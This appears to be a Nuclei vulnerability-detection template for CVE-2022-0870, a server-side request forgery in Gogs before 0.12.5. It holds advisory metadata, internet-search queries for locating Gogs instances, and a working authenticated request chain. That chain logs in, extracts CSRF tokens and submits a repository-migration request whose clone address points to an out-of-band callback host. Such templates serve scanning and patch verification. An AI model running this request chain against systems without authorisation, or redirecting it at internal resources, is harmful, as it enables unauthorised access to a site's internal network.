id: CVE-2022-0870 info: name: Gogs <0.12.5 - Server-Side Request Forgery author: theamanrawat,Akincibor severity: medium description: | Gogs GitHub repository before 0.12.5 is susceptible to server-side request forgery. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources. remediation: Fixed in version 0.12.5. reference: - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531 - https://nvd.nist.gov/vuln/detail/CVE-2022-0870 - https://github.com/cokeBeer/go-cves - https://github.com/michaellrowley/michaellrowley classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-0870 cwe-id: CWE-918 epss-score: 0.00179 epss-percentile: 0.54242 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: gogs product: gogs google-query: intitle:"sign in - gogs" shodan-query: cpe:"cpe:2.3:a:gogs:gogs" fofa-query: title="sign in - gogs" tags: cve,cve2022,ssrf,gogs,authenticated,huntr http: - raw: - | GET /user/login HTTP/1.1 Host: {{Hostname}} - | POST /user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}} - | GET /repo/migrate HTTP/1.1 Host: {{Hostname}} - | POST /repo/migrate HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - "http" - type: word part: body_1 words: - 'content="Gogs' extractors: - type: regex name: csrf group: 1 regex: - 'name="_csrf" value="(.*)"' internal: true - type: regex name: auth_csrf group: 1 regex: - 'name="_csrf" content="(.*)"' internal: true # digest: 490a0046304402206862f6cedae78e1be7b3fb449423df989aba5f79a58464dfdf723627158a590e022079c3eec48989b675d19b20bf089dfef10998b5f291e5177a0b9b7862808b8345:922c64590222798bb761d5b6d8e72950